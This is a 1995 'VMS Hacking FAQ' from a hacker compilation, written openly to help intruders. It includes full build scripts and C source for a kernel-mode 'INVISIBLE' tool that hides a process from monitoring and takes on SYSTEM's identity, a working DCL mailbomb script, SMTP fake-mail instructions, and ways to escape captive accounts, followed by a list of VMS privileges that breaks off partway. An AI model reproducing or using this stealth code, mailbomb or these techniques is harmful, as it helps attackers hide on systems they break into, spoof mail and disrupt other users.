Hacker's Arsenal - The Cutting Edge of Hacking
Hacker's Arsenal - The Cutting Edge of Hacking.iso
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[This is a very premature release, but I wanted to go ahead and get it out]
- VMS FAQ (Frequently Ask Questions) -
- Beta 0.01 Release -
This article contain the answers to some frequently asked question
(Hence, the name FAQ) about hacking the VMS operating system.
The article may be freely redistributed in its entirety provide
that credits are not altered or removed. It may not be
sold for profit or incorporated in commercial documents without
the written permission of the author(s).
This is the beta release of this article, which means,
the article is still in the working, and is not complete.
Submissions, corrections, comments, input, complaints,
bomb threats, cash, etc., should be directed toward
The Beaver (beaver@upperdck.blkbox.com).
Index ---:
More Common Newbie Questions:
1. VMS Basic information ("What does VMS run on?")
2. Password storage information (SYSUAF.DAT) ("Where the hell is the
/etc/passwd file??!?!?!")
3. Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS
4. Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?")
5. SET DEFAULT command ("How the do I change damn directory's?")
6. The infamous "CD" .COM file ("I hate this SET DEFAULT crap")
7. LOGIN.COM ("Okay, where's my .profile???").
8. Captive Accounts ("I can't get to DCL").
VMS Mail Hack Routines:
1. Fake Mail ("How do I send fake mail to VMS machines?")
2. Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?")
3. Mail Bomb ("I need to mailbomb a user from my VMS account, how?)
User/Image Privilege Information:
1. Systems Privileges, Listing and explanation ("How are Priv's setup?")
2. Creating privileged imagines ("Can I create a SUID Shell on a VMS box?")
DECNetwork Information.
1. Brief Description of a DECNet ("What's a DECNet?")
2. What it means to you ("What can it do for me?")
3. Obtaining files/system info/etc ("How do I get information for the remote?")
4. Using remote nodes ("How do I connect interactively?")
5. Getting node lists ("How do I find connectable nodes?")
6. Proxy Logins ("Can't DECNet nodes be protected?")
7. Proxy Logs ("Are Proxy logins logged? Can I use it to break into nodes?")
TCP/IP Connected VMS Machines.
1. Obtaining remote usernames without "FINGER" ("How do I get usernames
if FINGER is disabled")
2. Changing the image running in FINGER ("How do I link a command name to
another so it appears I am running a different image?")
- More Common Newbie Questions -
1. "What does VMS run on?"
VMS (Virtual Memory System) runs on Digital Equipment Corp.
(DEC - pronounced, "DECK") VAX (Virtual Address eXtension)
and the newer Alpha's. The user uses DCL (DEC Command
Language) to interact with the computer. These commands
and there syntax are completely different then those of
Unix and Unix-like operating systems, thus a completely
different mindset is often required (this is the authors
2. "Why A 'VMS-Hacking FAQ'?"
Several reasons. Once and a while, A escape from Unix is
very, very nice. Another reason is that is art of
VMS hacking has since vanished, and its replacement are
statements like, "Hacking VMS is impossible", "VMS is
to cryptic to use", and as always, "Man, VMS sucks".
These are generally statements by people who know almost
zero about VMS. I don't want to go into a "which OS is
better", because that would defeat the purpose of this
file", but in my personal opinion, both OS's have
there advantages/disadvantages.
I have, however, written this FAQ with a Unix overtone
to it, to help the reader understand what is trying to
be accomplished in some examples.
3. "Where in the hell is the passwd file???!?!?!"
There is no /etc/passwd file. All user information is kept in
a file called SYSUAF.DAT, which is stored in the directory
(or actual the logical) SYS$COMMON. This file is usually
not readable by "normal" users.
4. "Is there a version of "Crack" that I can run on a VMS machine?"
The unix program, "Crack" will not work, but there are password
guessing routines available.
The best on I have seen is "GUESS_PASSWORD.EXE", which can be
obtained from the following sites.
In order for the routine to work, you need access to the
SYSUAF.DAT. This version works on both OpenVMS VAX and
5. "Can I 'Cloak' in routine in VMS?"
Yes. Below is the code needed to make your process invisible
to "FINGER", "SHOW USERS", etc...
First, create the following file:
---------------------------------[Cut Here]-----------------------------------
$ save_verify = 'f$verify(0)'
$ system = "vax" !Set to "alpha" for Alpha
$! File to build Ehud Gavron's INVISIBLE
$! Author: Hunter Goatley
$ say := write sys$output
$ on error then goto common_exit
$ on contrl_y then goto common_exit
$ say "Extracting $JIBDEF and $PCBDEF from LIB.MLB...."
$ library/macro/extr=$JIBDEF/out=jibdef.mar sys$library:lib.mlb
$ library/macro/extr=$PCBDEF/out=pcbdef.mar sys$library:lib.mlb
$ say "Converting $*DEF macros to C .H files...."
$ call convert_to_h jibdef.mar
$ call convert_to_h pcbdef.mar
$ say "Compiling INVISIBLE...."
$ cc invisible
$ say "Linking INVISIBLE...."
$ link/notrace invisible,invisible.opt_'system'/opt
$ say "INVISIBLE build completed"
$ common_exit:
$ exit f$verify(save_verify).or.1
$ convert_to_h: subroutine
$ name = f$parse(p1,"","","NAME")
$ open/read tmp 'p1'
$ create 'name'.H
$ open/append tmph 'name'.H
$ cvt_loop:
$ read/error=cvt_fin tmp line
$ if f$extract(0,4,line).nes."$EQU" then goto cvt_loop
$ write tmph "#define ",f$extract(4,255,line)
$ goto cvt_loop
$ cvt_fin:
$ close tmp
$ close tmph
$ write sys$output "C header file ''name'.H created"
$ exit
$ endsubroutine
-------------------------------[End Of File]-----------------------------------
Next is the C Code for the "INVISIBLE" routine....
---------------------------------[Cut Here]------------------------------------
* Invisible - Make a process invisible and visible again. Originally
* written in MACRO32. Now in C so it runs on Alpha too.
* Option file invisible.opt:
* ALPHA: sys$loadable_images:sys$base_image.exe/share
* VAX: sys$system:sys.stb/selective_search
* Build:
* $ cc invisible
* $ link invisible,invisible/opt
* Usage:
* $ run invisible
* Ehud Gavron
* ACES Consulting Inc.
* Gavron@ACES.COM
* 14-Oct-1992 Ehud Gavron Ported to C, Alpha, ANSI, and
* everything else.
#define module_name INVISIBLE
#define module_version "V1.0.0"
#ifdef __alpha
#pragma module module_name module_version
#else /* __vax */
#module module_name module_version
#endif /* __alpha */
#ifndef __alpha
#define sys$gl_ijobcnt sys$gw_ijobcnt
#include <descrip.h>
#include "jibdef.h" /* Extracted from LIB.MLB and massaged into C form */
#include "pcbdef.h" /* Extracted from LIB.MLB and massaged into C form */
#include <ssdef.h>
#include <jpidef.h>
#include <psldef.h>
#include <lnmdef.h>
typedef union {
struct {
short s_buflen;
short s_itemcode;
char *s_bufaddr;
int *s_retlen;
} s;
unsigned long end;
#define buflen s.s_buflen
#define itemcode s.s_itemcode
#define bufaddr s.s_bufaddr
#define retlen s.s_retlen
struct ISB {
int l_uic;
int l_namelen;
#ifdef __alpha
int l_jobtype;
char b_jobtype;
char b_terminal;
char t_lname[PCB$S_LNAME + 1];
char t_username[JIB$S_USERNAME + 1];
struct ISB isb;
static int lnm_retlen;
ITEMLIST lnm_itmlst[2];
ITEMLIST jpi_itmlst[2];
struct dsc$descriptor_s prcnam_desc;
struct dsc$descriptor_s prcnam;
int sysuic = 0x00010004;
char sysusername[] = "SYSTEM ";
char namebuf[PCB$S_LNAME];
#ifdef __alpha
int sys$cmkrnl(),sys$exit(),invisible_k();
int ss_stat;
lnm_itmlst[0].buflen = sizeof(isb);
lnm_itmlst[0].itemcode = LNM$_STRING;
lnm_itmlst[0].bufaddr = (char *)&isb;
lnm_itmlst[0].retlen = &lnm_retlen;
lnm_itmlst[1].end = 0;
jpi_itmlst[0].buflen = PCB$S_LNAME;
jpi_itmlst[0].itemcode = JPI$_PRCNAM;
jpi_itmlst[0].bufaddr = (char *)&isb.t_lname;
jpi_itmlst[0].retlen = (int *)&isb.l_namelen;
jpi_itmlst[1].end = 0;
prcnam_desc.dsc$a_pointer = (char *)&isb.t_lname;
prcnam_desc.dsc$w_length = PCB$S_LNAME;
prcnam_desc.dsc$b_dtype = DSC$K_DTYPE_T;
prcnam_desc.dsc$b_class = DSC$K_CLASS_S;
prcnam.dsc$a_pointer = (char *)&namebuf;
prcnam.dsc$w_length = PCB$S_LNAME;
prcnam.dsc$b_dtype = DSC$K_DTYPE_T;
prcnam.dsc$b_class = DSC$K_CLASS_S;
ss_stat = sys$cmkrnl(invisible_k,0);
(void) sys$exit(ss_stat);
int invisible_k()
int sys$getjpiw(),sys$crelnm(),sys$fao(),sys$setprn();
int strncpy(),sys$exit(),sys$trnlnm(),sys$dellnm();
int *a_long;
int acmode = PSL$C_KERNEL;
#pragma nostandard /* Oh well */
globalref ctl$gl_pcb;
globalref sys$gl_ijobcnt;
#pragma standard
int ss_stat;
char *pcb;
char *jib;
long *sts;
long *own;
char *p;
long *q;
int loop = 0;
pcb = (char *)ctl$gl_pcb;
if (pcb == 0) {
q = (long *)((char *)pcb + PCB$L_JIB);
jib =(char *) *q;
sts = (long *)((char *)pcb + PCB$L_STS);
if (*sts & PCB$M_INTER) { /* Do stealth mode */
*sts = *sts^PCB$M_INTER;
*sts = *sts|PCB$M_NOACNT;
own = (long *)((char *)pcb + PCB$L_OWNER);
if (*own == 0) { /* We are not a subprocess */
p = (char *)pcb + PCB$T_TERMINAL;
isb.b_terminal = *p;
*p = '\0';
#ifdef __alpha
q = (long *)((char *)jib + JIB$L_JOBTYPE);
isb.l_jobtype = *q;
*q = 0;
p = (char *)jib + JIB$B_JOBTYPE;
isb.b_jobtype = *p;
*p = '\0';
strncpy((char *)&isb.t_username,
(char *)(jib + JIB$T_USERNAME),
strncpy((char *)(jib + JIB$T_USERNAME),
(char *)&sysusername,
q = (long *)((char *)pcb + PCB$L_UIC);
isb.l_uic = *q;
*q = sysuic;
ss_stat = sys$getjpiw(0,0,0,&jpi_itmlst,0,0,0);
if (!(ss_stat & 1)) return(ss_stat);
ss_stat = sys$crelnm(0,
if (!(ss_stat & 1)) return(ss_stat);
do {
prcnam.dsc$w_length = PCB$S_LNAME;
ss_stat = sys$fao((char *)&fao_prcnam,
(char *)&prcnam.dsc$w_length,
(char *)&prcnam,
if (!(ss_stat &1)) return(ss_stat);
ss_stat = sys$setprn((char*)&prcnam);
} while (ss_stat == SS$_DUPLNAM);
else { /* unstealth */
ss_stat = sys$trnlnm(0,
if (!(ss_stat & 1)) return(ss_stat);
ss_stat = sys$dellnm(&lnm_tabnam,
if (!(ss_stat & 1)) return(ss_stat);
*sts = *sts|PCB$M_INTER;
*sts = *sts^PCB$M_NOACNT;
own = (long *)((char *)pcb + PCB$L_OWNER);
if (*own == 0) { /* We are not a subprocess */
q = (long *)((char *)pcb + PCB$L_UIC);
*q = isb.l_uic;
p = (char *)pcb + PCB$T_TERMINAL;
*p = isb.b_terminal;
#ifdef __alpha
q = (long *)((char *)jib + JIB$L_JOBTYPE);
*q = isb.l_jobtype;
p = (char *)jib + JIB$B_JOBTYPE;
*p = isb.b_jobtype;
strncpy((char *)(jib + JIB$T_USERNAME),
(char *)&isb.t_username,
prcnam_desc.dsc$w_length = (short)isb.l_namelen;
ss_stat = sys$setprn(&prcnam_desc);
#ifndef __alpha
int strncpy(a,b,c)
char *a,*b;
int c;
for (; c > 0; c--) {
*a++ = *b++;
--------------------------------[End Of File]----------------------------------
After these files are created, type in the following at your
DCL prompt:
$ @build_invisible ! This will build our INVISIBLE.EXE routine.
$ run invisible ! One the build is complete.
You should be completely "cloaked".
To obtain full source, readme files, etc, you can obtain this
program from:
4. "How do I change damn directory's?".
This is done via the "SET DEFAULT" command. In the following
$ SET DEFAULT device:[directory]
VMS uses a standard hierarchy system, in which devices and
directory's are separated. For example, our home device/directory
might be:
DISK3: would represent the device that we are on/using
while, [USR.JOEHACKER] would signify the actual directory
on that device that we are using. So, to change directory's,
we could type:
If [USR.BOB] is a existing directory, this would now be our
current path (and we would still be located on the DISK3:
device. If we wanted to simply back out one level (to the
[USR]) on that device, we would issue the following command:
The "[-]" signifies one directory back. So if our path is,
[USR.BOB.HACKING.VMS.PROGRAMS], and we want to get to the
[USR.BOB] directory, instead of typing the entire path
again, we could simply type:
"[---]" means, back out three levels of the hierarchy.
There can be several devices on one VMS system (Device names
can be obtained via a "SHOW DEVICES"). While your
home directory might be on DISK3, another users could
be on device DISK2. To switch devices, we can add in
the device name, followed by the directory (if needed).
So, if you need to get to a users who stores information
in the DISK2:[REALLY.SECRET.STUFF] directory, you could
type the following DCL command:
Or if we are currently in the "DISK3:[REALLY]" and we want
to get to the information in the "DISK2:[REALLY]" directory,
we could simply type
And the rest would be carried over.
In the event that you need to get to the top of the hierarchy
(Unix equivelant: "cd /"), SET DEFAULT (to any disk structured
device) to "[000000]". For example, to get to the very
top of the hierarchy on device DISK2, you would type.
$ SET DEFAULT DISK2:[000000]
VMS will also allow you to SET DEFAULT to a directory that does
not exist. When this happens, the operating system will
inform you of this when you try to issue a command that requires
some sort of file I/O. If at any point you get completely
lost, you can return to your "home" directory by typing
6. "I hate this SET DEFAULT crap. Can I just use 'cd' command like
I do in Unix?".
By default, no. There are two things that you can do.
One, add the following line to your "LOGIN.COM" (see
where my .profile in VMS' for more information)
$ CD :== SET DEFAULT ! I am hate typing that long "SET DEF" command
Or you can us the following .COM file, which will guarrent
that you eat as many resources as you can......
[Taken from Phrack, Vol. 2. Issue 19., File 2]
[ Coded By The Mentor ]
Code for CD.COM
$! CD.COM v6.09
$! The Ultimate Change Directory Command.
$ hdir = f$trnlnm("SYS$LOGIN") ! Home Directory
$ ndir = f$edit(p1,"UPCASE") ! New Directory
$ odir = f$environment("DEFAULT") ! Old Directory
$ prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
$ if (ndir .eqs. "") then goto DISPLAY ! No Dir
$ if (ndir .eqs. "*") then goto DIRSEARCH ! Search for Dirs
$ if (ndir .eqs. "?") then goto HELP ! Instructions
$ length = f$length(ndir) ! Fix up ndir
$ if (f$location("@",ndir) .eq. 0) .or. -
(f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
$ right = f$location("]",ndir) + 1
$ if (right .gt. length) then right = f$location(">", ndir)
$ if (right .le. length) then ndir = f$extract(0, right, ndir)
$ if (f$trnlnm(ndir) .eqs. "") then goto CASESYM ! Not Logical Name
$ ndir = f$trnlnm(ndir) ! Logical Name
$ goto PARSE
$ if ("''&ndir'" .eqs. "") then goto CASE0 ! Not Symbol
$ ndir = 'ndir' ! Symbol
$ goto PARSE
$ CASE0:
$ len_ndir = f$length(ndir) ! Regular Dir
$ if (f$location("[", ndir) .lt. len_ndir) .or. -
(f$location("<", ndir) .lt. len_ndir) then goto SETDIR
$ CASE1: ! Home Dir
$ if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
$ ndir = hdir
$ goto SETDIR
$ CASE2: ! . .. .dir
$ if (f$location(".", ndir) .nes. 0) then goto CASE3
$ if (ndir .eqs. "..") then ndir = "-"
$ if (f$extract(0, 2, ndir) .eqs. "..") -
then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
$ ndir = "[" + ndir + "]"
$ if (ndir .eqs. "[.]") then ndir = odir
$ goto SETDIR
$ CASE3: ! :
$ if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
$ left = f$location(":", ndir) + 1
$ symbol = f$extract(left, 1, ndir)
$ if (symbol .eqs. ":") then goto CASE3B ! :: Node
$ if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
$ ndir = f$extract(0, left, ndir) + "[" -
+ f$extract(left, len_ndir - left+1, ndir) + "]"
$ goto SETDIR
$ CASE3B: ! NODE::nothing
$ if (f$length(ndir)-1 .gt. left) then goto CASE3C
$ ndir = ndir + "[000000]"
$ goto SETDIR
$ CASE3C: ! NODE::directory
$ if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
then goto SETDIR
$ ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
$ goto SETDIR
$ CASE4: ! dir
$ ndir = "[" + ndir + "]"
$ set default 'ndir'
$ if (f$parse("") .eqs. "") then goto DIRERROR
$ if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
$ hnode = f$getsyi("NODENAME")
$ cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
$ if (cnode .eqs. "") then cnode = hnode
$ cdir = f$environment("DEFAULT")
$ write sys$output " "
$ write sys$output " Home Node: ", hnode
$ write sys$output " Home Directory: ", hdir
$ if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
$ write sys$output " Current Node: ", cnode
$ write sys$output " Current Directory: ", cdir
$ write sys$output " "
$ ndir = f$environment("DEFAULT")
$ if .not. prompton then goto END
$ if (f$length(ndir) .ge. 32) then goto TOOLONG
$ set prompt = 'ndir'" "
$ END:
$ exit
$ write sys$output " "
$ write sys$output " ", ndir, " Directory does not exist!"
$ write sys$output " "
$ set default 'odir'
$ ndir = odir
$! Prompt Problems------------------------------------------------------------
$! Prompt is too long. Get rid of everything to the left of [ or <. If that
$! doesn't work, get rid of a subdirectory at a time. As a last resort,
$! set the prompt back to $.
$ left = f$location("[", ndir)
$ len_ndir = f$length(ndir)
$ if (left .ge. len_ndir) then left = f$location("<",ndir)
$ if (left .gt. 0) .and. (left .lt. len_ndir) -
then ndir = f$extract(left, len_ndir - left, ndir)
$ if (f$length(ndir) .lt. 32) then goto SETPROMPT
$ left = f$location(".", ndir) + 1
$ len_ndir = f$length(ndir)
$ if left .ge. len_ndir then ndir = "$ "
$ if left .ne. len_ndir -
then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
$! Wildcard Directory---------------------------------------------------------
$ error_message = f$environment("MESSAGE")
$ on control_y then goto DIREND
$ on control_c then goto DIREND
$ set message/nosev/nofac/noid/notext
$ write sys$output " "
$ dispct = 1
$ dirct = 0
$ pauseflag = 1
$ userfile = f$search("*.dir")
$ if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
$ if (userfile .eqs. "") then goto DIRNONE
$ dispct = dispct + 1
$ dirct = dirct + 1
$ on severe then $ userprot = "No Priv"
$ userprot = f$file_attributes(userfile,"PRO")
$ if userprot .nes. "No Priv" then userprot = " "
$ userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
$ userprot'dirct' = userprot
$ lengthflag = (f$length(userfile'dirct') .gt. 18)
$ if lengthflag then write sys$output -
f$fao(" !3SL !34AS ", dirct, userfile'dirct'), userprot'dirct'
$ if (.not. lengthflag) then write sys$output -
f$fao(" !3SL !20AS ", dirct, userfile'dirct'), userprot'dirct'
$ if (dispct .lt. 8) then goto DIRLOOP
$ dirct = dirct + 1
$ userfile'dirct' = ""
$ dirct = dirct + 1
$ userfile'dirct' = ""
$ if pauseflag then goto DIRMENU
$ dispct = 0
$ goto DIRLOOP
$ write sys$output " "
$ if (userfile .eqs. "") then goto DIRMENU2
$ write sys$output " M More subdirectories"
$ if pauseflag then -
$ write sys$output " N More subdirectories/No pause"
$ write sys$output " R Re-Display subdirectories"
$ write sys$output " Q Quit (default)"
$ write sys$output " "
$ inquire dirchoice " Select One"
$ write sys$output " "
$ if (dirchoice .gt. 0) .and. -
(dirchoice .le. dirct) then goto DIRCASEDIGIT
$ dirchoice = f$edit(dirchoice,"UPCASE")
$ if (dirchoice .eqs. "") .or. -
(dirchoice .eqs. "Q") then goto DIRCASEBLANK
$ if (dirchoice .eqs. "M") .or. -
(dirchoice .eqs. "N") then goto DIRCASEMORE
$ if (dirchoice .eqs. "R") then goto DIRCASERED
$ if (dirct .eq. 1) then write sys$output -
" Select 1 to change to the ", userfile1, " subdirectory. "
$ revdirct = dirct
$ if (dispct .eq. 8) then revdirct = revdirct - 2
$ if (dirct .gt. 1) then write sys$output -
" Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
$ if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
$ ndir = userfile'dirchoice'
$ goto DIREND
$ write sys$output " Subdirectory not changed."
$ write sys$output " "
$ goto DIREND
$ dispct = 0
$ if (dirchoice .eqs. "N") then pauseflag = 0
$ if (userfile .nes. "") then goto DIRLOOP
$ write sys$output " No more subdirectories to display."
$ dispct = 1
$ if (userfile'dispct' .eqs "") then goto DISPDONT
$ lengthflag = (f$length(userfile'dispct') .gt. 18)
$ if lengthflag then write sys$output -
f$fao(" !3SL !34AS ", dispct, userfile'dispct'), userprot'dispct'
$ if (.not. lengthflag) then write sys$output -
f$fao(" !3SL !20AS ", dispct, userfile'dispct'), userprot'dispct'
$ dispct = dispct + 1
$ if (dispct .le. dirct) then goto DISPLOOP
$ goto DIRMENU
$ write sys$output "No subdirectories to choose, or no directory privileges."
$ write sys$output " "
$ goto DIREND
$ set message 'error_message'
$ on control_y then exit
$ on control_c then exit
$ if (ndir .eqs. "*") then goto DISPLAY
$ goto PARSE
$ type sys$input
CD.COM Version 6 VMS Change Directory Command
Usage: CD command/directory
CD Display home directory, CD .. Change directory to the
current directory, node. CD [-] dir above current dir.
CD \ Change directory to your CD ..sub Change directory to a
CD HOME SYS$LOGIN directory. CD [-.sub] "sideways" subdirectory.
CD dir Change directory to the CD * Display/select the
CD [dir] [dir] directory. available subdirectories.
CD .sub Change directory to the CD . Reset current directory.
CD [.sub] [.sub] subdirectory. CD ? Display CD instructions.
To make CD available from To have the VMS $ prompt
any directory you change to. display the current directory.
By The Mentor
$ goto END
Once uploaded, you should add the following line you your
$ CD :== @DEVICE:[PATH]CD.COM ! Replace DEVICE/PATH with user information
7. "Okay, where my .profile"
Easy. There is none. VMS startup routines (for personal accounts)
can be found in the user's home directory under the name
8. "I can't seem to get to the DCL prompt"
It is possible to setup "CAPTIVE" accounts under VMS. When setup
correctly, these can be difficult to break out of, however,
in alot of cases, a simple control-C while the LOGIN.COM
is executing. Another method of keeping the LOGIN.COM
(or any commands for that fact) is to login with the
"/NOCOMMAND" flag. This flag is placed after your username
at the USERNAME prompt, and will bypass any account startup
files/commands. On a correctly setup captive account,
this will bomb out. In the even that this fails, some
places slip up by allowing a parent to spawn off other
processes. For example, if the captive account puts you
into FTP, or ALL-IN-ONE (Office automation/mail package),
it might be able to 'SPAWN' out to DCL. This can also
be prevented by simply setting up process limitation
on the account.
- VMS SMTP/Mail Information. -
1. "I am attempting to send fakemail by connecting to the SMTP port,
but everytime I issue the 'mail from', it gives me a 'Mailbox syntax
incorrect', or 'Bad arguments'. I try the standard format a *always*
use, but it *still* gives me this crap! What's the problem?"......
Of course, it is possible to send fake mail by connecting to
the VMS machines SMTP (Simple Mail Transfer Protocol) port (25),
however, VMS "sendmail" routines tend to be a little more picky. For
example, the session below would *appear* that it should work...
------<Start Session>-------
telnet 25
Type ^] (decimal 29) <CR> to return to NetBlazer
Telnet session 0 connected to bogus.add.com
220 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service ready at Fri, 6 Jan 1995
6:25:01 -0500 (EST)
250 BOGUS.ADD.COM ; Hello , pleased to meet you.
mail from: bob@unknown
553 Mailbox syntax incorrect
221 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service complete at Fri, 6 Jan 19
95 6:25:22 -0500 (EST)
Telnet session 0 closed: EOF
-------<End Session>---------
As you can see, however, this is not the case. Where is problem
lies is in the fact, that alot of VMS sendmail routines require "<", and
">" around "mail from" and "rcpt to" commands, and sometimes a address
(Especially the case with Multinet SMTP, and Pathway's Wollangong
Sendmail). In order to get a good mailing address to "work", try
"mail from: <bob@bogus.add.com>". Some VMS SMTP services do not require
the address, but in most cases, the ">" and "<" are required. The
same applys with the "rcpt to" command. You might need to format it
the same as the "mail from". I.E. - "rcpt to: <system>" or "rcpt to:
2. "Can I use my favorite Unix sendmail holes on VMS sendmail?"
Don't be silly. No... Digital did not believe that sendmail
bugs and holes where important enough to port (grin). (It
has been rumored that one sendmail hole *was* actually ported,
but as of this time, this has not be verified.
3. "How can I code a mail bomb routine, so that I can piss off
people really good and eat 'bandwidth'."
Like this, below...
$! Simple VMS Mailbomb routine.
$! Please be someone human. Don't do this crap.
$ say :== write sys$output
$ on error then goto err
$ if p4 .eqs. ""
$ then
$ say "Mailbomb V1.0 Coded By The Beaver"
$ say "1995"
$ say ""
$ say "Usage:"
$ say "MAILBOMB [Msg Subject] [File to bomb with] [Username] [# of Times]"
$ exit
$ endif
$ A=1
$ loop:
$ mail/subject='p1' 'p2' 'p3'
$ A = A + 1
$ if A .eqs. p4
$ then
$ say "Bomb Is Complete"
$ exit
$ endif
$ goto loop
$ err:
$ say "A Error has occured. Be sure all file are present and correct"
$ exit
- User/Image Privilege Informations -
1. "How are user privileges setup?"
User privleges are handled in a completely different manor
than Unix handles them. With unix, you have either
a> all priveleges (IE - "root")
b> standard user
VMS is a touch different.
For example, let say you have a field engineer that needs
a standard user account (I.E. - be able to send/receive mail,
do standard DCL commands.. Normal TMPMBX, NETMBX, and
all that), but in order to do his job, he needs to run the
online VMS diagnostics software (which is a privileged operation)
When you add the user, you can grant him "DIAGNOSE" privledges,
and normal user privileges, and he will be able do regular users
commands and run diagnostics.
What this means is that you can grant certain privileged
function to certain users, rather than giving the user
"the whole system".
This user we added would only have access to privileges that deal
with the diagnostic software. For example, he could not add
users (via "AUTHORIZE" or modify the SYSUAF.DAT).
"Privileges restrict the user of certain system functions to processes
created on the behalf of authorized users. These restrictions protect
the integrity of the operating system code, data, and resources and
thus, the integrity of user services."
"Users cannot execute an image that requires a privilege they do not
possess, unless the image is installed as a known image with the
privilege in question or the image runs within a protected subsystem"
Privileges can also be installed on images, so that when that
image is executed, that images process get the permissions
that it has been granted (this does not mean that the user gets
the privileges, but rather, just the process running this
- OpenVMS VAX Guide To System Security
(6.0 manual).
Below is a listing of privileges, and a brief description.
ACNT - Lets a process use the RUN (Process) command to create
Process ($CREPRC) system service to create processes
in which accounting is disabled. A process in which
account is disabled is on whose resources are not logged.
ALLSPOOL - This privlege lets user's process allocate a spooled
device by executing the Allocate Device ($ALLOC) system
service or by users the DCL command "ALLOCATE"
ALTPRI - Allows the user's process to
1. Increase its own priority
2. Set the base priority of a target process
3. Change priority of its batch or print jobs.
AUDIT - Allows software to append to audit records to the system
security audit log file. As a result, this privilege
permits the logging of events that appear to come from the
operating system
BUGCHK - Allows the process to make bugcheck error log entries
from users, supervisor, or compatibility mode or to send
messages to the system error logger.
BYPASS - Allows the user's process full access to all protected
objects, totally bypassing UIC-based protection,
ACL protection (Access Control List) and mandatory
access controls. Users with this privilege can
modify authorization records (SYSUAF.DAT, where
usernames/passwords are stored), rights identifiers
(RIGHTSLIST.DAT), DECNet object passwords and accounts
(NETOBJECT.DAT), and unlimited file access.
CMEXEC - Allows the user's process to execute the Change Mode to
Executive system service.
CMKRNL - Allows the user's process to execute the Change Mode to
Kernel system services. These privileges allow
things like modify a multiprocessor operation (START/
CPU, STOP/CPU type commands), modifying the system
rights list (SET RIGHTS/ATTRIBUTE), change a processes
UIC (SET UIC), and other functions.
DETACH - Processes can create detached processes that have there
own UIC without the DETACH privilege, provided the
processes wants to specify a different UIC for the
DIAGNOSE - Lets a process run online diagnostic programs and intercept
and copy all messages written to the error log file.
DOWNGRADE - Permits a process to manipulate mandatory access controls.
EXQUOTA - Allows the space taken by the user's files on a given
disk volumes to exceed any usage quotas set for the user
(as determined by UIC) on those volumes.
GROUP - Allows the user's process to affect other processes in its
own group.
GRPNAME - Lets the user's process bypass access controls
and insert names into (and delete from) the logical table
of the group to which the process belongs by the use of the
Create Logical Bane and Delete Logical Name system services.
GRPPRV - When the process's group matches the group of the object
owner, the GRPPRV privilege gives a process the access rights
provided by the object's system protection field. GRPPRV
also lets a process change the protection or the
ownership of any object whose owner group matches the
process's group by using the DCL commands SET SECURITY
IMPORT - Lets a process manipulate mandatory access controls. The
privilege lets a process mount unlabeled tape volumes.
This privilege is reserved for enhanced security products
like SEVMS.
LOG_IO - Lets the user's process execute the Queue I/O request
($QIO) system service to perform logical-level I/O
MOUNT - Lets the user's process execute the mount volume QIO
NETMBX - lets a process perform functions related to a DECNet
Computer Network.
OPER - Allows a process to use the Operator Communications
Manager (OPCOM) process to reply to user's request,
to broadcast messages to all terminals logged in, to
designate terminals as operator terminals and specify
the types of messages to be displayed to these operator's
terminals, and to initialize and control the log file
of operator's messages.
PFNMAP - Lets a user's process create and map page frame number
(PFN) global sections to specific pages of physical
memory or I/O device registers, no matter who is using
the pages or registers.
PHY_IO - Lets the user's process execute the Queue I/O request
($QUI) system service to perform physical-level I/O
PRMCEB - Lets the user's process create or delete a permanent
common even flag cluster by executing the Associate
Common Event Flag Cluster.
PRMGBL - Lets the user's process create or delete permanent
global section by executing the Create and Map Section
or Delete Global Section system service. In addition
, a process with this privilege (plus CMKRNL and SYSGLB
privileges) can use the Install utility (INSTALL)
PRMMBX - Lets user's process create or delete permanent mailbox
by the Create Mailbox and Assign Channel system service
or the DElete Mailbox system service. Mailboxes are
buffers in virtual memory that are treated as if they were
record oriented I/O devices. A mailbox is used for
general interprocess communications.
PSWAPM - Lets the user's process control whether is can be
swapped out of the balance set by executing the
Set Process Swap Mode system service.
READALL - Lets the process bypass existing restrictions that would
otherwise prevent the process from reading an object.
Unlike the BYPASS privilege which will permits writing and
deleting, READALL permits only the reading of objects
and allow updating of such backup-related file
characteristics as the backup date.
SECURITY - Lets a process perform security related functions such
as modifying the system password with the DCL command
SET PASSWORD /SYSTEM or modifying the system alarm
and auditing settings using the DCL command
SETPRV - Lets user's create process whose privileges are greater
than its own. With this privilege, a user can obtain
any other privilege via the DCL command "SET PROCESS/
SHARE - Lets process assign channels to devices allocated to other
processes or to a nonshared device the Assign I/O Channel
system service.
SHMEM - Lets the user's process create global sections and
mailboxes (permanent or temporary_ in memory shared by
multiple processors if the process also has appropriate
SYSGBL - Lets user;s create or delete system global sections by
executing the Create and Map Sections or the Delete
Global Section system services. With this privilege
and CMKRNL and PRMGBL, the Install command (INSTALL)
can be used.
SYSNAM - Let's user's process bypass discrepancy access
controls and insert names into the system logical
name table and delete names from that table. A
process with this privilege can use the DCL commands
ASSIGN and DEFINE to add names to the system logical
in the user or executive mode and can use the DEASSIGN
command in either mode to delete names from the
SYSPRV - Lets a process access security objects by the system
protection field and also read and modify the owner
(UIC), the UIC-based protection code, and the ACL
of and object. Any processes with this privilege
can add, modify, or delete entries in the system
user authorization file (SYSUAF.DAT)
TMPMBX - Lets user's create process create a temporary mailbox
by executing the Create Mailbox and Assign Channel.
UPGRADE - Lets a process manipulate access controls. This privilege
